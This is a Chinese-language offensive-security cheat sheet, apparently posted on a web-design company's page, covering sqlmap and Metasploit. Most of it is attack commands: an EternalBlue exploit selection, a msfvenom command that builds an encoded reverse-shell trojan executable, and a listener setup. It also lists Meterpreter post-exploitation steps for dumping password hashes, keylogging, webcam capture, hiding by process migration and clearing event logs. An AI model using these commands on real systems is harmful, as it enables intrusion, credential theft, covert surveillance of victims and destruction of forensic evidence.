茂名市网站建设_网站建设公司_虚拟主机_seo优化
2026/1/1 14:26:42 网站建设 项目流程

一、测试

sqlmap -u  "网址"

二、msf用法

2.1.常用命令

基础命令:
msfconsole 启动Metasploit控制台 help 查看帮助 search
<关键词> 搜索模块(如search eternalblue) use <模块路径> 使用某个模块(如use exploit/windows/smb/ms17_010_eternalblue) show options 显示当前模块的配置选项 set <参数> <值> 设置参数(如set RHOSTS 192.168.1.1) setg <参数> <值> 全局设置参数(对所有模块生效) unset <参数> 取消参数设置 back 退出当前模块 exit/quit 退出msfconsole

查看模块:show exploits 显示所有漏洞利用模块

  show payloads 显示当前模块可用的Payload
  show auxiliary 显示所有辅助模块
  show encoders 显示编码器
  show nops 显示NOP生成器

漏洞利用:

# 设置Payload(例如反向Shell)
set payload windows/x64/meterpreter/reverse_tcp

# 设置监听IP(本机)
set LHOST 192.168.1.100
set LPORT 4444

# 执行漏洞利用
run
# 或
exploit

# 后台执行(保持会话)
exploit -j

会话管理

sessions 查看所有活跃会话
sessions -i <ID> 进入指定会话(如sessions -i 1)
background 将当前会话放到后台(快捷键:Ctrl+Z)
kill <ID> 结束指定会话
sessions -u <ID> 升级Shell为Meterpreter会话

Meterpreter常用命令

sysinfo 查看目标系统信息
getuid 查看当前用户权限
shell 切换到系统Shell
upload <本地文件> <远程路径> 上传文件
download <远程文件> <本地路径> 下载文件
ps 查看进程列表
migrate <PID> 迁移进程(提权/隐藏)
run post/windows/gather/hashdump 导出密码哈希
screenshot 截屏
keyscan_start 开始键盘记录
keyscan_dump 导出键盘记录
webcam_snap 摄像头拍照
clearev 清除日志

搜索:

search type:auxiliary name:smb # 搜索SMB相关辅助模块
search cve:2023-1234 # 搜索特定CVE编号
search platform:windows eternal # 搜索Windows平台的永恒之蓝相关

 

2.1模块路径:

exploit漏洞利用模块路径:/usr/share/metasploit-framework/modules/exploits

payload模块路径:/usr/share/metasploit-framework/modules/payloads,常见的payload有:

windows/meterpreter/bind_tcp       #正向连接
windows/meterpreter/reverse_tcp    #反向连接,常用
windows/meterpreter/reverse_http   #通过监听80端口反向连接
windows/meterpreter/reverse_https  #通过监听443端口反向连接
 
正向连接使用场景:我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口
反向连接使用场景:我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。 
反向连接80和443端口使用场景:被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信

2.3案例    

生成木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload.exe

设置远程监听 msfconsole use exploit
/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport run    

后期迁移

# 在Meterpreter会话中运行:
run post/windows/manage/migrate # 自动进程迁移
run post/multi/gather/ping_sweep # 内网存活主机扫描


# 在msfconsole中使用:
use post/windows/gather/enum_shares
set SESSION 1
run

 

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询